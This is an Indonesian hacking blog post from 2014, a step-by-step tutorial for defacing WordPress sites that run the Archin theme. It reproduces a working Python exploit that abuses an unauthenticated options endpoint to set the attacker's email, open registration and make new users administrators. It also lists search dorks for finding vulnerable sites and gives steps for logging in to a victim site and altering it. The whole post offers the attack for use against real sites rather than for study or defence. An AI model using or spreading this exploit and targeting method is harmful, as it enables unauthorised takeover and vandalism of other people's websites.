Wednesday, March 12, 2014

Cara Deface Dengan Archin [ WordPress ]

Assalamualaikum Wr Wb.....

eh kamu ,, ketemu lagi sama saya [ ./V404 ]
hihihi ..

nih aku ada tutor untuk deface website Dengan Archin [ Wordpress ]
kali ini pake script PYTHON ( waaw mulai script2an nih :P )

Langsung saja yaaaa ....

Siapkan Bahan :

1. Python ( kalau di Back|Track sudah ada pada default nya )
|| kalau windows bisa download dibawah ini .||
             >>> DOWNLOAD <<<

2. Kopi dan Rokok :D

Langkah selanjutnya ..

Aku anggap kamu uda punya , dan install python nya yaa :D

>> Copy Script Python dibawah ini ..
# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site
site = "Targetkamu"
#path to ajax.php
url = "/wp-content/themes/GantiDengantema/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
  
ChangeOption(site, url, "admin_email", "emailkamu")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
*Ganti

>> Targetkamu dengan site target kamu
>> GantiDenganTema dengan tema target kamu
>> emailkamu dengan Email kamu ( nanti user sama pass nanti masuk situ )

hahahahhhhhaaa :D

Setelah kamu copy script diatas ,paste kan ke notepad ,atau apalah .. pkok nya script editor :P
Save filenya dengan berekstensi .py Inget .py , jangan yang lain loh Wkwkwk :P
Contoh : exploit.py [ saya beri nama exploit ]

Lalu cari target website dengan mengunakan dork berikut :
 DORK:
/wp-content/themes/*/hades_framework/
 /wp-content/themes/felici/hades_framework/
 /wp-content/themes/averin/hades_framework/
 /wp-content/themes/shotzz/hades_framework/
 /wp-content/themes/KLR/hades_framework/
 /wp-content/themes/yvora/hades_framework/
 /wp-content/themes/ratius/hades_framework/
 /wp-content/themes/dagda/hades_framework/
 /wp-content/themes/shopsum/hades_framework/
 /wp-content/themes/ultrici/hades_framework/
 /wp-content/themes/bizniz/hades_framework/
 /wp-content/themes/appius/hades_framework/
 /wp-content/themes/majestics/hades_framework/
 /wp-content/themes/candy/hades_framework/
 /wp-content/themes/vithy/hades_framework/
 /wp-content/themes/sodales/hades_framework/
Lalu Coba Buka Misalnya Saya Tadi Pakek Dork /wp-content/themes/candy/hades_framework/

Berarti Ntar Cek Sitenya Vuln Atau Tdk Dengan Cara http://site/wp-content/themes/candy/hades_framework/option_panel/ajax.php/

>>Jika Target Tersebut Blank/Kosong Berarti Web Berikut Vuln :D

Setelah Itu Buka Start => run => cmd
ketik "C:" (karena script yg diatas saya letakkan di local disk C)

ketik lagi "exploit.py" ( karena tadi saya beri nama exploit :P
>>pencet enter.

Jika Sudah Registrasi Password Akan Terkirim Ke Email Tadi Cek Email Kamu ..


Lalu Login deh ke >> http://sitekorban.com/wp-login.php

lalu terserah deh .. mau diapain .. :P
kalau bisa jangan di tebas INDEX.html nya ..
susah loh buat index itu .. RENAME aja :P

Sekian dari saya , semoga bermanfaat :Dhheheheeehe

"I love you Watanabe Mayu ( Mayuyu AKB48 ) :*
Copas kasih sumber ya .. Hargailah Penulis :)
 Content Creator : ./V404

0 comments:

Post a Comment